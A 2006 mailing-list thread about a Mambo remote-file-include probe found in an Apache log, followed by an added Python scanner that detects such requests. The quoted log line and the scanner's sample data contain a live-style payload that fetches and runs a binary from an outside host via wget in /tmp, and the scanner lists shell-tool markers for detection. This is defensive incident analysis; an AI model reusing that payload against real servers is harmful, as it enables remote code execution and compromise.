
Re: Strange Apache log and mambo security - sexy executable



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Edward Shornock wrote:
> On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> > Hi,
> > 
> > yesterday morning I found a strange entry in my apache log files (debian
> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> > Server, just serving my Family and some good friends (normally).
> > 
> > ---cut---
> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo| HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > ---cut---
> > 
> > As I patched mambo against the recent "register globals" attack and my /tmp
> > is mounted noexec, the attack doesn't exploit anything.
> > 
> > However, out of curiosity I downloaded this sexy executable to have a closer look.
> > 
> > ---cut---
> > backup:/home/qmb# ./sexy -h
> > ./sexy <host> <port>
> > ---cut---
> > 
> Never run apps like this as root.  Bad bad idea.

There is an old saying in Germany:

"Only damage will make you wise"

Even though the box where I tried it was on the second line and I did not pass
any arguments (IP/port) to the tool, I now see the chance that it would have
polluted the whole LAN and probably even found a way to the outside.

Thank God it wasn't that evil, so the Knoppix restore could fix the
situation.

> If you want more information about this tool, google for "Linux.RST.B"
> or "Unix/RST.B".

Thank you very much.

- --
- - maik
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFD1LDZz3bq6aadmI8RAj/fAJ93fsZEUSRiPNRGUqs7Q7t6pDOF8wCeK1Tn
LzAJkhxI+Kfs5njhvwZ/Xio=
=3tRt
-----END PGP SIGNATURE-----
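The log entry quoted in this thread has the three tell-tale parts of a PHP register_globals / remote-file-include probe: superglobal overrides (`_REQUEST[...]`, `GLOBALS=`), a configuration variable (`mosConfig_absolute_path`) pointed at a remote URL so the include pulls attacker code, and a `cmd=` parameter carrying a shell one-liner that fetches and runs a binary from /tmp. The following is an added example, not code from the thread or from Mambo: a small Apache combined-log scanner that parses each request, percent-decodes the query string and flags those three patterns. The first sample line is the entry from the mail with the line-wrapped IP rejoined; the other two lines, the heuristic marker lists and all function names are constructed for this example.

```python
"""Flag PHP register_globals / remote-file-include attempts in Apache logs.

Added example, not code from the original thread. The heuristics follow the
shape of the log entry quoted above: a GLOBALS=/_REQUEST[...] override, a
config variable pointed at a remote URL, and a cmd= parameter carrying shell.
"""
import re
from urllib.parse import unquote_plus

# Apache "combined" format. The request URL is captured as one non-space field
# because the attacker-controlled query may contain ';', '|' and similar.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameter names that only make sense if register_globals lets a client
# overwrite internal variables or superglobals (assumed list for this example).
GLOBALS_OVERRIDE_RE = re.compile(
    r'^(GLOBALS\b|_(REQUEST|GET|POST|COOKIE|SERVER|FILES|ENV|SESSION)\b)')
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Substrings typical of a shell one-liner in a cmd= style parameter (assumed).
SHELL_MARKERS = ("wget ", "curl ", "chmod ", "cd /tmp", "/bin/sh", "uname -a")


def parse_query(query):
    """Split a raw query string into percent-decoded (name, value) pairs.

    Done by hand rather than with urllib.parse.parse_qsl so that ';' inside a
    value is never treated as a separator (older Pythons did that) and blank
    values such as 'GLOBALS=' are kept.
    """
    pairs = []
    for chunk in query.split('&'):
        if not chunk:
            continue
        name, _, value = chunk.partition('=')
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyze_line(line):
    """Return a record for one log line, or None if it does not parse.

    The record's 'findings' is a list of (kind, detail) tuples; an empty list
    means nothing suspicious was seen in the query string.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('url').partition('?')
    findings = []
    for name, value in parse_query(query):
        if GLOBALS_OVERRIDE_RE.match(name):
            findings.append(('globals_override', name))
        if REMOTE_URL_RE.match(value):
            findings.append(('remote_include', f'{name}={value}'))
        if any(marker in value for marker in SHELL_MARKERS) or value.rstrip().endswith('|'):
            findings.append(('shell_payload', f'{name}={value}'))
    return {'ip': m.group('ip'), 'path': path,
            'status': m.group('status'), 'findings': findings}


def scan(lines):
    """Analyze every line; return only the records with at least one finding."""
    hits = []
    for line in lines:
        rec = analyze_line(line)
        if rec and rec['findings']:
            hits.append(rec)
    return hits


# Sample input: the entry quoted in the mail (wrapped IP rejoined) plus two
# constructed lines, one benign and one with a legitimate-looking URL parameter.
SAMPLE_LOG = [
    '132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?'
    '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
    'mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&'
    'cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;'
    './sexy%2071.137.131.26%208080;00;echo%20YYY;echo| HTTP/1.1" 200 28 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '10.0.0.5 - - [19/Jan/2006:08:00:00 +0100] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [19/Jan/2006:08:01:00 +0100] "GET /index.php?return=http://example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for rec in scan(SAMPLE_LOG):
        print(rec['ip'], rec['path'], rec['status'])
        for kind, detail in rec['findings']:
            print('   ', kind, detail)
```

The third sample line shows why the remote-URL check is a triage signal rather than a verdict: a redirect parameter legitimately carries a URL, so a single `remote_include` finding needs a look at the application, whereas the quoted entry trips all three checks at once. Note also that the server answered the probe with 200 and 28 bytes; with register_globals patched and /tmp noexec that is just the page rendering, but the same status on an unpatched host would not tell you the include failed, so the decoded `cmd=` value is what to check against process and /tmp activity.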
